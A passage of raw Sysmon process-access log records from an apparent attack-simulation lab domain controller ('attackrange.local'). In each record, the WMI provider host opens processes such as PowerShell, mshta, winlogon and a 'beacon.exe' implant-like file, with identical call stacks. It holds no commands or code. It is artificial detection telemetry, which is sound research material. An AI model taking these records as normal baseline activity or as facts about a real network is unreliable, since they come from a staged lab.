System32\RPCRT4.dll+111bc 10341000x80000000000000001697205Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.074{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7946-6039-1610-00000000AD01}3144C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697204Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.074{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B70F-00000000AD01}5892C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697203Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.074{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B60F-00000000AD01}5836C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697202Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.074{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74FB-6039-800F-00000000AD01}6628C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697201Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.074{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-780F-00000000AD01}6760C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697200Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.074{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-770F-00000000AD01}7048C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697199Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.074{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-72C7-6039-2E0F-00000000AD01}4048C:\Users\Administrator\Desktop\beacon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697198Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.074{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CBF-6039-3A0E-00000000AD01}4736C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697197Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.074{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-32CA-6039-2C07-00000000AD01}1356C:\Windows\system32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697196Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.074{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CD05-00000000AD01}656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697195Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.074{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CA05-00000000AD01}4956C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697194Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.074{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C405-00000000AD01}5096C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697193Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.074{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C105-00000000AD01}1648C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697192Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.073{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-232D-6039-D900-00000000AD01}3148C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697191Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.072{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5500-00000000AD01}3736C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697190Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.071{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5100-00000000AD01}3532C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697189Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.071{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3200-00000000AD01}3220C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697188Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.070{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3000-00000000AD01}3052C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697187Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.070{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2F00-00000000AD01}2724C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697186Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.069{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2E00-00000000AD01}2684C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697185Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 